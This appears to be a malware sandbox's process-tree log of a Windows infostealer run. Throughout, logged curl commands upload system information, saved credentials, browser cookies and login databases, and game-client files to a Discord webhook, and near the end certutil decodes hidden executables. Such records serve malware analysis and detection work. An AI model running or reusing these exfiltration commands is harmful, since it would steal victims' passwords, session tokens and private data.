C:\Windows\system32\findstr.exe
findstr [
5⤵
PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
4⤵
PID:5300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-RestMethod api.ipify.org
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2080

C:\Windows\system32\curl.exe
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[ 1. Report from Admin - 10.127.0.105 @ 12:31:46.33 ] \nBatch process started...```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1176

C:\Windows\system32\curl.exe
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[ Version info from Admin - 10.127.0.105 @ 12:31:46.91 ] \n Version - 1.2.0 (MADE BY GHOST.exe)```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4512

C:\Windows\system32\systeminfo.exe
SystemInfo
4⤵
- Gathers system information
PID:1748

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F systeminfo=@"C:\Users\Admin\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2728

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:3544

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\tasklist.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5976

C:\Windows\system32\net.exe
net user
4⤵
PID:4600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
5⤵
PID:3508

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\netuser.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3268

C:\Windows\system32\quser.exe
quser
4⤵
PID:4256

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\quser.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4100

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
4⤵
- Modifies registry key
PID:5088

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\stup.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3916

C:\Windows\system32\cmdkey.exe
cmdkey /list
4⤵
PID:3164

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\cmdkey.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1484

C:\Windows\system32\ipconfig.exe
ipconfig /all
4⤵
- Gathers network information
PID:4924

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\ipconfig.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:928

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MICROSOFT EDGE // from Admin - 10.127.0.105 @ 12:31:53.70```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2924

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F hstry=@"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6104

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5476

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Cookies-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2444

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Network Persistent State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3756

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"NetworkDataMigrated" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3996

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Reporting and NEL" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5712

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Reporting and NEL-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5000

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"SCT Auditing Pending Reports" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2292

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Sdch Dictionaries" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4528

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"TransportSecurity" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4868

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Trust Tokens" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3924

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Trust Tokens-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5020

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME // from Admin - 10.127.0.105 @ 12:31:58.98```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5692

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2496

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Cookies-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:740

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Network Persistent State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6072

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"NetworkDataMigrated" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1688

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Reporting and NEL" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1892

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"Reporting and NEL-journal" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4552

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"SCT Auditing Pending Reports" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2264

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"TransportSecurity" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:404

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2924

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:4744

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2444

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3756

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2060

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:5580

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5336

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:3064

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA // from Admin - 10.127.0.105 @ 12:32:09.11```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2164

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1164

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3924

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:5020

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6140

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2660

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5736

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:3916

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- VIVALDI // from Admin - 10.127.0.105 @ 12:32:11.22```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1912

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Cookies" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4372

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\History" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5220

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
- Delays execution with timeout.exe
PID:952

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Shortcuts" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1840

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Bookmarks" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5308

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Login Data" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5128

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:4440

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX // from Admin - 10.127.0.105 @ 12:32:13.11```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles"
4⤵
PID:1892

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\logins.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2020

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
- Delays execution with timeout.exe
PID:4460

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\key3.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:952

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\key4.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4296

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\cookies.sqlite" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2660

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
- Delays execution with timeout.exe
PID:3760

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\logins.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2240

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:5968

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\key3.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3692

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\key4.db" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6088

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\cookies.sqlite" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3592

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
- Delays execution with timeout.exe
PID:4520

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- osu! // from Admin - 10.127.0.105 @ 12:32:18.13```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4296

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\osu!\osu!.Admin.cfwh
4⤵
PID:6052

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- DISCORD // from Admin - 10.127.0.105 @ 12:32:18.49```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discord\Local Storage\leveldb\"
4⤵
PID:4512

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- STEAM // from Admin - 10.127.0.105 @ 12:32:18.99```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3692

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Program Files (x86)\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:4612

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F loginusers=@"C:\Program Files\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files (x86)\Steam\"
4⤵
PID:6116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files\Steam\"
4⤵
PID:5220

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MINECRAFT // from Admin - 10.127.0.105 @ 12:32:19.58```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5856

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:1896

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3064

C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
4⤵
PID:5032

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- GROWTOPIA // from Admin - 10.127.0.105 @ 12:32:21.19```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:5228

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F save.dat=@"C:\Users\Admin\AppData\Local\Growtopia\save.dat" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:3568

C:\Windows\system32\attrib.exe
Attrib +h +s hdiwhduewih291.tmp
4⤵
PID:5212

C:\Windows\system32\certutil.exe
certutil -decode hdiwhduewih291.tmp s.exe
4⤵
PID:6112

C:\Windows\system32\timeout.exe
timeout 2 /nobreak
4⤵
PID:5304

C:\Windows\system32\attrib.exe
Attrib +h +s s.exe
4⤵
PID:5976

C:\Windows\system32\attrib.exe
Attrib -h -s hdiwhduewih291.tmp
4⤵
PID:4528

C:\Windows\system32\attrib.exe
Attrib +h +s monitor.bat
4⤵
PID:3252

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\6578254637456475426.vbs"
4⤵
- Checks computer location settings
- Loads dropped DLL
PID:3292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\monitor.bat" "
5⤵
PID:5124

C:\Windows\system32\timeout.exe
timeout 1
6⤵
PID:1596

C:\Windows\system32\timeout.exe
timeout 1
6⤵
- Delays execution with timeout.exe
PID:1892

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:4828

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:4512

C:\Windows\system32\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:5684

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:5976

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:2808

C:\Windows\system32\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:4256

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:1444

C:\Windows\system32\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:3544

C:\Windows\system32\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:2060

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:5196

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:5304

C:\Windows\system32\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:4692

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:6040

C:\Windows\system32\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:2088

C:\Windows\system32\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:5216

C:\Windows\system32\timeout.exe
timeout 2
6⤵
PID:1652

C:\Windows\system32\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:4440

C:\Windows\system32\timeout.exe
timeout 2 /nobreak
4⤵
- Delays execution with timeout.exe
PID:6096

C:\Windows\system32\attrib.exe
Attrib +h +s Do_Not_Delete..file
4⤵
PID:6052

C:\Windows\system32\certutil.exe
certutil -decode Do_Not_Delete..file System.exe
4⤵
PID:2284

C:\Windows\system32\timeout.exe
timeout 2 /nobreak
4⤵
PID:1840

C:\Windows\system32\attrib.exe
Attrib +h +s System.exe
4⤵
PID:3656

C:\Windows\system32\attrib.exe
Attrib -h -s Do_Not_Delete..file
4⤵
PID:952

C:\Windows\system32\mode.com
mode con cols=150 lines=30
4⤵
PID:5596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.jpg
4⤵
PID:2240

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5248

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6136

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5828

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5300

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3688

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
